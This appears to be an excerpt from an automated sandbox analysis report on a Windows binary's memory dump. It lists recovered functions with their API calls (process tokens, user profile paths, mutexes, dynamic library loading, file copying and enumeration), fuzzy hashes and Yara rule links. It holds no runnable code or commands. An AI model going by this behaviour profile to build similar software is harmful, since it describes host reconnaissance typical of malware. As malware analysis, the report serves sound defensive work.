API String ID: 3802493581-0
Opcode ID: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
Instruction ID: 58dbb2a7c24e90d438a2da79032e2a45378735c8f22fe598a552312de627870f
Opcode Fuzzy Hash: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
Instruction Fuzzy Hash: 1BF08272A00111BFE7205B6A9C0DD6B766DDB8A770714063AFC22E72D0E7B49D4186BF

Uniqueness

Uniqueness Score: -1.00%

Function 00435BAC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 00435BC4
OpenProcessToken.ADVAPI32(00000000), ref: 00435BCB
GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00435BDD
CloseHandle.KERNEL32(?,?,00000200), ref: 00435BEA

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
String ID:
API String ID: 1246687928-0
Opcode ID: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
Instruction ID: ef9c7944da9d0fbe57d85c82d9cb878354d8ff5e49230341588292012951431b
Opcode Fuzzy Hash: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
Instruction Fuzzy Hash: DBF01C71E10208BBEB109BA0DC49EAA7BACEB09244F1000A5E802E1150E6B5EA009A6A

Uniqueness

Uniqueness Score: -1.00%

Function 00457A19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000005,~eD,00000000,?,00457F36,00000010,~eD,00000000,?,00421A56,~eD), ref: 00457AB5
GetLastError.KERNEL32(?,00457F36,00000010,~eD,00000000,?,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457ADB

Strings

~eD, xrefs: 00457A4E

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: ~eD
API String ID: 442123175-3356853795
Opcode ID: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
Instruction ID: bf65c0e4729e722a36b1f943ebc6129d69d6e6920ac8c12f1595faf670b95aa8
Opcode Fuzzy Hash: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
Instruction Fuzzy Hash: F1217E30A042199BDF15CF29DD80AEDB7B9EB49306F2440BAED06D7212D634DE46CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004360E7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39synchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 00436130
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D

Strings

ENXX, xrefs: 004360F7

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Mutex$CreateOpen
String ID: ENXX
API String ID: 4030545807-3763919171
Opcode ID: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
Instruction ID: d7b7153b0c48b5d91a1f0c999520678bb0e8285682fdc18e12bdb9ee44f3034a
Opcode Fuzzy Hash: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
Instruction Fuzzy Hash: D0F04610D083897ACF029BF90C458FFBFFC9D1E284F40A06EE84163203F5A4454583BA

Uniqueness

Uniqueness Score: -1.00%

Function 00454394, Relevance: 4.6, APIs: 3, Instructions: 102COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00454424
_free.LIBCMT ref: 0045443F
_free.LIBCMT ref: 0045444A

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 998237bf2c02d3bab8b1c3209bd1d292d35af422afda6b1d253f4c71c9fe9ac8
Instruction ID: 3e742d4ad3c1d8b086767c22b8182da7200762670e3272377d429c9ef6d80560
Opcode Fuzzy Hash: 998237bf2c02d3bab8b1c3209bd1d292d35af422afda6b1d253f4c71c9fe9ac8
Instruction Fuzzy Hash: 5321AD3660C1106BDF149E759846BBB7B55CFC231DF24015FED40AF343E92A4D4E8258

Uniqueness

Uniqueness Score: -1.00%

Function 004349A2, Relevance: 4.6, APIs: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
Instruction ID: f49f4c1cb75c5fbd49bede2b2b2e0205ee8556af43aa466e30f1fd9c6e14c3ef
Opcode Fuzzy Hash: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
Instruction Fuzzy Hash: 38213874E04248DF9B05DFA898508FFFBB9EE9A304F0451AED841B3201EB749E05CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9DC, Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A9E1
___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AA60

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 3696715561-0
Opcode ID: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
Instruction ID: 0113cde70424d24ccef5238eb5fdd89d76e8d8ac18f929500eaf95b908a89b9e
Opcode Fuzzy Hash: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
Instruction Fuzzy Hash: 0421D231710705EBCF20EAA5DA81BDE73A5AF08314F10442BF802A61D1D7789E51CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF49, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,0041FD07,00000140,?,?,00000000), ref: 0041EF66
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041FD07,00000140,?,?,00000000,?,004205B0), ref: 0041EF87
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0041FD07,00000140,?,?,00000000,?,004205B0,?,?,00000244,00488780), ref: 0041EFC1

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
Instruction ID: 590f5f10effc152a812acbf342452f322146615697fe813b7eabbc86673be59a
Opcode Fuzzy Hash: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
Instruction Fuzzy Hash: 81118674A44305BEE7108F399C85F96BB98FB05320F104625F925D72C1D3B4A9408764

Uniqueness

Uniqueness Score: -1.00%

Function 0043DBE2, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 0043DC15
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,75146490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC32
CloseHandle.KERNEL32(?,?,?,00004098,75146490,00000000,?,0043EB85,?,?,0042CEB9), ref: 0043DC42

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
Instruction ID: 550ff010cc939da366848678e5ec9f0b7c02c89e159099b7b19e896844ef7b36
Opcode Fuzzy Hash: e48d622de60c70f1e6bb29bf885ae58b6a6e0b3b64331a7a970e46566c513ccf
Instruction Fuzzy Hash: D7115670D10B009EDB328B17AC44B13BAE9EB9A761F10652FE59581640D6F49844DF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00459D09, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00421A56,00000000,00000002,00421A56,00000000,?,?,?,00459DB6,00000000,00000000,00421A56,00000002), ref: 00459D42
GetLastError.KERNEL32(?,00459DB6,00000000,00000000,00421A56,00000002,?,004464A1,?,00000000,00000000,00000001,00421A56,?,?,00446557), ref: 00459D4C
__dosmaperr.LIBCMT ref: 00459D53

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
Instruction ID: a1e4ff7bec2cfff123a609e7ffbf930a0197e3222467c7c804d78764c443cfe2
Opcode Fuzzy Hash: 27104622859b43d5d0758ad57ef1ede1b45be39dee652525f4e95165173d909b
Instruction Fuzzy Hash: 45014C33B00115EFCF159F59DC0586E3B39DF85321B24020AF8119B291FB75DD0587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042B31D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B322

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 0042BC7F: __EH_prolog.LIBCMT ref: 0042BC84

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

"\, xrefs: 0042B528

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: "\
API String ID: 2428181759-2226538752
Opcode ID: 3a068705f9f750bd154c1fcaa71793a3e2478d03552b21cde58aed19e8719fd0
Instruction ID: 74c8e02cedf363cec93cb5a21cd2564252097201552f7d0fce9620bf0d274a46
Opcode Fuzzy Hash: 3a068705f9f750bd154c1fcaa71793a3e2478d03552b21cde58aed19e8719fd0
Instruction Fuzzy Hash: 3FC1E130E04258CBDF15EFA5C9906EDBB71EF55308F5480AED0497B242DF381A89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00454938, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004549EB

Strings

SJE, xrefs: 004549DB

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID: SJE
API String ID: 269201875-2644204395
Opcode ID: b8150987f72e3c97242f4e62867784d0d85217f32ebc9ed0459587252f25cc84
Instruction ID: ebd4d9a9195427f260e92c6a94f4750c42fe7235fc0ebbbc6bacbd5fe412a5e5
Opcode Fuzzy Hash: b8150987f72e3c97242f4e62867784d0d85217f32ebc9ed0459587252f25cc84
Instruction Fuzzy Hash: CA318D76A006109F8B04CFA9C48495EB7B1FFC932472585A6D929EB361D330AC45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A2D9

Part of subcall function 004091F2: __EH_prolog.LIBCMT ref: 004091F7
Part of subcall function 004091F2: std::exception::exception.LIBCONCRT ref: 00409298

Strings

Unknown exception, xrefs: 0040A348

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$std::exception::exception
String ID: Unknown exception
API String ID: 1037574509-410509341
Opcode ID: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
Instruction ID: d1b7aa20dfa380f05ae0c9d45f11c5fbc92261fe5dbcb6166fee3a439ce0bcbc
Opcode Fuzzy Hash: 110c0cf9c9989f7fa33b286c836881199d8f00c6baa4c1a89d63c38074886dec
Instruction Fuzzy Hash: 1B21A972D00305AFCB159FA9D4405EAFBB1FF08308F10C56EE81AAB241D3759A01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004137E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004137E9

Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2

Strings

NA, xrefs: 0041383D

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: NA
API String ID: 3519838083-2562218444
Opcode ID: 181df0eba96cc29876ef3396f1a6a40a793ba8a1f07bf979f73459ae1dee672a
Instruction ID: da25af750edcbdee1afc70327f05f7be60494842f1cb4fd143c88d520103cf3c
Opcode Fuzzy Hash: 181df0eba96cc29876ef3396f1a6a40a793ba8a1f07bf979f73459ae1dee672a
Instruction Fuzzy Hash: D1119171A05215AFDF15EFA9C8857DEBBB0AF08304F0080AFE509A7391C7749E04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004091F2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004091F7
std::exception::exception.LIBCONCRT ref: 00409298

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologstd::exception::exception
String ID:
API String ID: 2619619420-0
Opcode ID: 826c467441db4db0064f628c771aba3b856fcf79f9254d48bb4d2c5154439bef
Instruction ID: 4ca3936c078d54e57671f6f98a26ddc2dbffc98c2064a6f7f6a0a40424ae653c
Opcode Fuzzy Hash: 826c467441db4db0064f628c771aba3b856fcf79f9254d48bb4d2c5154439bef
Instruction Fuzzy Hash: 9E31F571D00208DFCB15EFA9C885ADEBBF4FF18314F14842EE415A7281E7789A85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCB2, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
_strlen.LIBCMT ref: 0041FCD8

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory_strlen
String ID:
API String ID: 942933051-0
Opcode ID: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
Instruction ID: 4c7206307d1035eeeff1e9c0a0999dde91d7a809fbe3ac133bfd090c61ce09d6
Opcode Fuzzy Hash: 733dbe867288d5ca66b91b49cc6e58ce280549d4c6316cb80bb52f9bf1a0da96
Instruction Fuzzy Hash: 77014C726082055AE728977DB805BFB73E99B45724F20003FF857C7180EA68DCC7825C

Uniqueness

Uniqueness Score: -1.00%

Function 00435484, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00435489

Part of subcall function 00435346: lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353C0
Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353CC

_strlen.LIBCMT ref: 0043549D

Part of subcall function 004116B4: __EH_prolog.LIBCMT ref: 004116B9

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologlstrcpy$_strlenlstrlen
String ID:
API String ID: 27009005-0
Opcode ID: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
Instruction ID: 967c59de1264e5437e808e2dc9646ed90955aae641b5eab628f7aa89402fc85e
Opcode Fuzzy Hash: cf419d6034521a529b3b937dd3b5183a6b79423b6b2fc12cd6bea7836fd04c3b
Instruction Fuzzy Hash: AC112570D00556EAEB19FB75DC52EEEBB359F50308F1081AEE00663243EB384B45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0043DDD0, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,0542AFD8,?,00000000,?,0043E3C4,?), ref: 0043DE13

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
Instruction ID: 7b0ff4dd052904a3b23983b3bd9cd87b3b88dbabaee70fd5e41bad5e6d0b566c
Opcode Fuzzy Hash: 5958af012b2363362042ea7e508fcc9436c77a530ec058238d0ea4f7d295c598
Instruction Fuzzy Hash: B401B171A00B00AFE7214E3AACC6BA7FEE8FB69758F10413FF65686250C7B49C009625

Uniqueness

Uniqueness Score: -1.00%

Function 004542F3, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045433B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e23c552bf6bfc6e7df87c784f5635b051a6b7052c5b1130287b4626a5af3a196
Instruction ID: d5218cd339a65762510a81b9e079e4446c8f6c3996e41a5cb6ded0dde42ff173
Opcode Fuzzy Hash: e23c552bf6bfc6e7df87c784f5635b051a6b7052c5b1130287b4626a5af3a196
Instruction Fuzzy Hash: 49E0303270951066D221662B6C0566E15859BD133FF11033FFC208E5F2DB6C488A959E

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADBE, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADCA

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADDC

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction ID: a824447d2fdea08db754f01d1575c5cda49c6909b15693c7d8439b486d980dbb
Opcode Fuzzy Hash: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction Fuzzy Hash: DBE0803110424577DF015A13DD0196B7717FF91355B10103BFD0456991D775DC7165D9

Uniqueness

Uniqueness Score: -1.00%

Function 0043EC21, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043EF0B,?,0040B6A1,00000000,?,?,?,?,0040B6A1,?), ref: 0043EC31
GetLastError.KERNEL32(?,0043EF0B,?,0040B6A1,00000000,?), ref: 0043EC47

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 58b0a90eb6ed054f5c13d71288aa4f4864bf2095164f77525f082a59b8b3d4fb
Instruction ID: c3eae09050113aaa56b93bb7bcaafac247cb116d4b7d05269366418418acabbb
Opcode Fuzzy Hash: 58b0a90eb6ed054f5c13d71288aa4f4864bf2095164f77525f082a59b8b3d4fb
Instruction Fuzzy Hash: 7DE02630A08188BFDB018B66DC08F6E3FE9AF18304F18C054F40485251DAB4D501DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0042B76D, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042B772

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: 45088e0f1c916c60db29a2a7037f6d1042c3958923a6dc4a2e66dd06d18e2d9d
Instruction ID: 961e30c5faa2a638eb1dabf367997125721a18bc80a6a3d51cdc21dae2d9d728
Opcode Fuzzy Hash: 45088e0f1c916c60db29a2a7037f6d1042c3958923a6dc4a2e66dd06d18e2d9d
Instruction Fuzzy Hash: BA819C70D012AC9ADB01DFE9DA811ECFBB0FF6A308F50925EE84477252DB740A89CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00411230, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411235

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4a2b1f1f68d7be386dadc5944ee95ee5cef48f31dd162d6cbe70f63ee8268179
Instruction ID: dc4a73e1b3eed8f5466efea9ab6fbc2949c634d1f19277dd442a4c8a1a499091
Opcode Fuzzy Hash: 4a2b1f1f68d7be386dadc5944ee95ee5cef48f31dd162d6cbe70f63ee8268179
Instruction Fuzzy Hash: 6E515831D00219DFDF14DFA9D4908EEBBB5EF48320F60026FE522A3695D739A985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00413B98, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413B9D

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d969057b2c9edf4b20e3a5efd7ebe5ea69cb5f15263f61e9dfcb87d24167adf6
Instruction ID: 1590526c6e7a1ea769188aa884af5b1b43062d79938ce3292021d864919962f1
Opcode Fuzzy Hash: d969057b2c9edf4b20e3a5efd7ebe5ea69cb5f15263f61e9dfcb87d24167adf6
Instruction Fuzzy Hash: A851B135A045059FCB24CFACC5C08EDBBB1BF48715B24425AE525AB392E734EE81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00411A2D, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ce2e5e3ec8f6dbd2a89fc4f2f38cde2683e77fe5ce65743bb79c636d20993a
Instruction ID: 9296e774f7676c17423c1ca821238ec4e049e1c4d15cb0688202de38e1809e13
Opcode Fuzzy Hash: e3ce2e5e3ec8f6dbd2a89fc4f2f38cde2683e77fe5ce65743bb79c636d20993a
Instruction Fuzzy Hash: 5A410774A04705DFC715CF68C18099ABBF1FF4A314B108AAAD95A8B7A0E734F980CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1D7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F207

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
Instruction ID: 7a39a49cf585f4d0e46ac43e0a9d888c8851a94b0eff99b2d07aad98a01891d0
Opcode Fuzzy Hash: e3175f79339e4997ac26686c8279300ca21be3ca15003d7aa02cc50c41f7abd4
Instruction Fuzzy Hash: 0B310679F04205ABDF14CAA5C8406EEBBA5AB41320F2441BFE501E73C1DA799DCA8748

Uniqueness

Uniqueness Score: -1.00%

Function 0043614D, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436152

Part of subcall function 00413383: __EH_prolog.LIBCMT ref: 00413388

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 30e752ed0d1e01b068403d8f7c5b0fd3b97e7d53c5964b2d911650a73d7daf90
Instruction ID: fe10076f0eb781e04d3e5f2d024a678e22d48b2bbc721e39841d5c83f663e4db
Opcode Fuzzy Hash: 30e752ed0d1e01b068403d8f7c5b0fd3b97e7d53c5964b2d911650a73d7daf90
Instruction Fuzzy Hash: 6D3138B1901218DFEB14DF65DC95FEDB3B4AB44304F1081AFE809A7281D7745E44CE64

Uniqueness

Uniqueness Score: -1.00%

Function 004392B7, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004392BC

Part of subcall function 004147AA: __EH_prolog.LIBCMT ref: 004147AF

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ea0b6e27bd021820b62f47da8042964ebdbd49466a4f660c9dccf5ea70a4d932
Instruction ID: 6be09e817262d6fd016b7c756547bfcd74f1d2dd2460e91cb2eed3baf958d87c
Opcode Fuzzy Hash: ea0b6e27bd021820b62f47da8042964ebdbd49466a4f660c9dccf5ea70a4d932
Instruction Fuzzy Hash: 78317EB1E082449FCB14DFA9C490AADBBB0AF4C324F24515FE416973C1DBB88E45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004235F2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004235F7

Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92

Part of subcall function 004206DD: __EH_prolog.LIBCMT ref: 004206E2

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID:
API String ID: 2888657697-0
Opcode ID: 8e069e10c124f76dbfdf9f5eec350fc0786ad79a8b55455886eee2af0a8ff065
Instruction ID: cd57585f92f4651694f3437ef3a0fe2b6c7561e3377806dc9b6083a3b3dba577
Opcode Fuzzy Hash: 8e069e10c124f76dbfdf9f5eec350fc0786ad79a8b55455886eee2af0a8ff065
Instruction Fuzzy Hash: 6B3189B1D04269EFCF04EFA6D591AEDFB70BF58308F60445EE40167242DB786A48CB99

Uniqueness

Uniqueness Score: -1.00%

